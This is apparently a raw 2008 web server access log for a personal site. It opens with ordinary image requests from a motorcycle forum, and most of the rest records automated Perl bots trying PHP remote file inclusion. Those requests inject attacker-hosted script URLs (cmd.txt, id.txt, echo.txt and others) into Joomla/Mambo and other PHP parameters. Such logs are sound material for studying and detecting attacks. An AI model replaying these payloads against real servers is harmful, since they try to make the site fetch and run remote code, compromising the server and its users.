130.76.32.16 - - [05/May/2008:10:19:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
130.76.32.16 - - [05/May/2008:10:19:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:19:37 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:19:38 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:19:43 -0700] "GET /logs/access_080215.log/@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:10:19:46 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:10:19:48 -0700] "GET /////?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:10:19:49 -0700] "GET /logs/////?mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 200 46134 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:20:17 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:20:17 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:20:21 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:20:22 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:20:24 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:20:25 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:04 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:04 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:04 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:04 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:04 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:04 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:05 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:05 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:05 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:07 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:07 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:07 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:07 -0700] "GET /common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:07 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.165.13 - - [05/May/2008:10:21:07 -0700] "GET /logs/common/db.php?commonpath=http://forsalebyowner.com.au/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:21:18 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:21:19 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:21:19 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:21:23 -0700] "GET /logs/access_080215.log/auto.php?inc=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:21:23 -0700] "GET /auto.php?inc=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:21:23 -0700] "GET /logs/auto.php?inc=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:10:21:33 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:21:40 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:21:58 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:22:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:22:29 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:22:43 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:22:46 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:22:54 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:22:55 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:22:55 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:23:00 -0700] "GET /@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.217.116.153 - - [05/May/2008:10:23:18 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/ninguem/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.217.116.153 - - [05/May/2008:10:23:18 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/ninguem/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.217.116.153 - - [05/May/2008:10:23:18 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://h1.ripway.com/ninguem/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:23:23 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.93.56.80 - - [05/May/2008:10:23:38 -0700] "GET /logs/access_080215.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [05/May/2008:10:23:38 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [05/May/2008:10:23:39 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [05/May/2008:10:24:00 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:24:29 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:24:30 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:24:30 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [05/May/2008:10:24:44 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [05/May/2008:10:24:51 -0700] "GET /index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [05/May/2008:10:24:52 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:25:04 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:25:04 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:25:06 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 46126 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:25:08 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:25:14 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 46126 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:25:15 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:10:26:02 -0700] "GET /errors.php?error=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:10:26:17 -0700] "GET /logs/errors.php?error=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:26:23 -0700] "GET /logs/scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:26:23 -0700] "GET /scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:26:38 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:26:38 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:26:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:27:01 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:27:06 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:10:27:19 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.106.231.114 - - [05/May/2008:10:27:29 -0700] "GET /logs/access_080315.log/common/db.php?commonpath=http://www.fkaskad.ru/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.231.114 - - [05/May/2008:10:27:30 -0700] "GET /common/db.php?commonpath=http://www.fkaskad.ru/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.231.114 - - [05/May/2008:10:27:30 -0700] "GET /logs/common/db.php?commonpath=http://www.fkaskad.ru/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
190.54.49.157 - - [05/May/2008:10:27:40 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
190.54.49.157 - - [05/May/2008:10:27:40 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:27:52 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:27:56 -0700] "GET //appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:27:56 -0700] "GET /logs/access_080122.log/scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:27:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:27:57 -0700] "GET /scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:27:57 -0700] "GET /logs/scanhttp://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
